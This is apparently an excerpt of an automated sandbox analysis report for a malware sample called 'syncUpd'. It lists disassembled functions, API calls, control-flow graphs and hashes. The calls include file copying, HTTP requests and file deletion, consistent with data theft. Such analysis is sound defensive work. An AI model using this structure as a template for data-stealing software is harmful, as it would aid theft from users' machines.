                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00405B5C
                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00405B73
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00405B85
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00405BAB
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405C5D
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405C6A
                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,0071DC78,?,00726330,00000000,00000000,00400100,00000000), ref: 004058A8
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                    • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405C74
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                                                                                                                                                                                                  • String ID: "$"$------$------$------$0cr$8me$-A$-A
                                                                                                                                                                                                                                  • API String ID: 148854478-1255095679
                                                                                                                                                                                                                                  • Opcode ID: 6882fe96c5024c80168a13641c85f07ff7a62da7ee737cdc8278628239c8db15
                                                                                                                                                                                                                                  • Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6882fe96c5024c80168a13641c85f07ff7a62da7ee737cdc8278628239c8db15
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040A030 Relevance: 32.0, APIs: 21, Instructions: 494stringmemoryfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1075 40a030-40a04c call 417070 1078 40a05d-40a071 call 417070 1075->1078 1079 40a04e-40a05b call 416e20 1075->1079 1085 40a082-40a096 call 417070 1078->1085 1086 40a073-40a080 call 416e20 1078->1086 1084 40a0bd-40a128 call 416d40 call 416fb0 call 416ea0 call 416e00 call 415260 call 416f20 call 416ea0 call 416e00 * 2 1079->1084 1118 40a12d-40a134 1084->1118 1085->1084 1094 40a098-40a0b8 call 416e00 * 3 call 413220 1085->1094 1086->1084 1112 40a6cf-40a6d2 1094->1112 1119 40a170-40a184 call 416d40 1118->1119 1120 40a136-40a152 call 4170d0 * 2 CopyFileA 1118->1120 1125 40a231-40a314 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416fb0 call 416ea0 call 416e00 * 2 1119->1125 1126 40a18a-40a22c call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 1119->1126 1133 40a154-40a16e call 416da0 call 415bd0 1120->1133 1134 40a16c 1120->1134 1184 40a319-40a331 call 4170d0 1125->1184 1126->1184 1133->1118 1134->1119 1194 40a680-40a692 call 4170d0 DeleteFileA call 417040 1184->1194 1195 40a337-40a355 1184->1195 1205 40a697-40a6ca call 417040 call 416e00 * 5 call 413220 1194->1205 1203 40a666-40a676 1195->1203 1204 40a35b-40a36f GetProcessHeap RtlAllocateHeap 1195->1204 1214 40a67d 1203->1214 1206 40a372-40a382 1204->1206 1205->1112 1211 40a601-40a60e lstrlen 1206->1211 1212 40a388-40a42a call 416d40 * 6 call 417070 1206->1212 1215 40a610-40a642 lstrlen call 416da0 call 401500 call 404dc0 1211->1215 1216 40a655-40a663 memset 1211->1216 1254 40a42c-40a43b call 416e20 1212->1254 1255 40a43d-40a446 call 416e20 1212->1255 1214->1194 1232 40a647-40a650 call 416e00 1215->1232 1216->1203 1232->1216 1258 40a44b-40a45d call 417070 1254->1258 1255->1258 1262 40a470-40a479 call 416e20 1258->1262 1263 40a45f-40a46e call 416e20 1258->1263 1267 40a47e-40a48e call 4170b0 1262->1267 1263->1267 1270 40a490-40a498 call 416e20 1267->1270 1271 40a49d-40a5fc call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4097f0 call 4170d0 lstrcat call 416e00 lstrcat call 416e00 * 6 1267->1271 1270->1271 1271->1206
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040A369
                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A
                                                                                                                                                                                                                                    • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0071C6F8,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                    • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                    • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040A510
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040A532
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040A554
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DA94), ref: 0040A563
                                                                                                                                                                                                                                    • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                    • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                    • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 0040A605
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 0040A614
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040A65D
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040A689
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2228671196-0
                                                                                                                                                                                                                                  • Opcode ID: 1be8ab2a907d9e706c53aba61d014c6190d35d913e1d6b750a15abe81ea94ca1
                                                                                                                                                                                                                                  • Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1be8ab2a907d9e706c53aba61d014c6190d35d913e1d6b750a15abe81ea94ca1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00404540 Relevance: 32.0, APIs: 11, Strings: 7, Instructions: 479networkstringfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1305 404540-404602 call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 1320 404604 1305->1320 1321 40460b-40460f 1305->1321 1320->1321 1322 404615-40478d call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 1321->1322 1323 404b8b-404bb3 InternetCloseHandle call 4170d0 call 4094a0 1321->1323 1322->1323 1409 404793-404797 1322->1409 1333 404bf2-404c62 call 415070 * 2 call 416da0 call 416e00 * 8 1323->1333 1334 404bb5-404bed call 416e20 call 416fb0 call 416ea0 call 416e00 1323->1334 1334->1333 1410 4047a5 1409->1410 1411 404799-4047a3 1409->1411 1412 4047af-4047e2 HttpOpenRequestA 1410->1412 1411->1412 1413 4047e8-404ae8 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416d40 call 416f20 * 2 call 416ea0 call 416e00 * 2 call 4170d0 lstrlen call 4170d0 * 2 lstrlen call 4170d0 HttpSendRequestA 1412->1413 1414 404b7e-404b85 InternetCloseHandle 1412->1414 1525 404af2-404b1c InternetReadFile 1413->1525 1414->1323 1526 404b27-404b79 InternetCloseHandle call 416e00 1525->1526 1527 404b1e-404b25 1525->1527 1526->1414 1527->1526 1528 404b29-404b67 call 416fb0 call 416ea0 call 416e00 1527->1528 1528->1525
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                    • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                    • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0071DC68), ref: 004045FA
                                                                                                                                                                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,0071DB88), ref: 00404AA8
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404B6D
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404B85
                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,0071DC78,?,00726330,00000000,00000000,00400100,00000000), ref: 004047D5
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                    • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404B8F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                                                                                                                                                                  • String ID: "$"$------$------$------$0cr$8me
                                                                                                                                                                                                                                  • API String ID: 460715078-1354028962
                                                                                                                                                                                                                                  • Opcode ID: a96af3eb48350165ce07f11a18bbf656ab0394dc54422d4bf228e890d6c8bbf5
                                                                                                                                                                                                                                  • Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a96af3eb48350165ce07f11a18bbf656ab0394dc54422d4bf228e890d6c8bbf5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040C640 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                    • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                    • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,0071FD48,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040C81E
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040C958
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040C97A
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040C99C
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040CA02
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040CA24
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33
                                                                                                                                                                                                                                    • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0071C6F8,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                    • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 0040CA7A
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 0040CA89
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040CAD2
                                                                                                                                                                                                                                    • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040CAFE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1973479514-0
                                                                                                                                                                                                                                  • Opcode ID: e15e7b3818335824e92093497ec12c2f43f4824fee4a3fb3cd78a1c5c67f75d1
                                                                                                                                                                                                                                  • Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e15e7b3818335824e92093497ec12c2f43f4824fee4a3fb3cd78a1c5c67f75d1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040FD10 Relevance: 28.9, APIs: 2, Strings: 14, Instructions: 857stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1702 40fd10-4109b7 call 416d40 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 4141c0 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414300 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414380 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 4143c0 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414400 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414450 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 4144b0 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414530 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414570 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414710 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 GetCurrentProcessId call 415b70 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414740 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414800 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 4147c0 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414960 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414ed0 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414a00 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414ae0 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414ae0 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 414de0 call 416f20 call 416ea0 call 416e00 * 2 call 4170d0 lstrlen call 4170d0 call 416d40 call 401500 call 404dc0 call 416e00 * 2 call 413220
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                    • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                    • Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                                                                                                                                                    • Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                                                                                                                                                    • Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                                                                                                                                                    • Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                    • Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
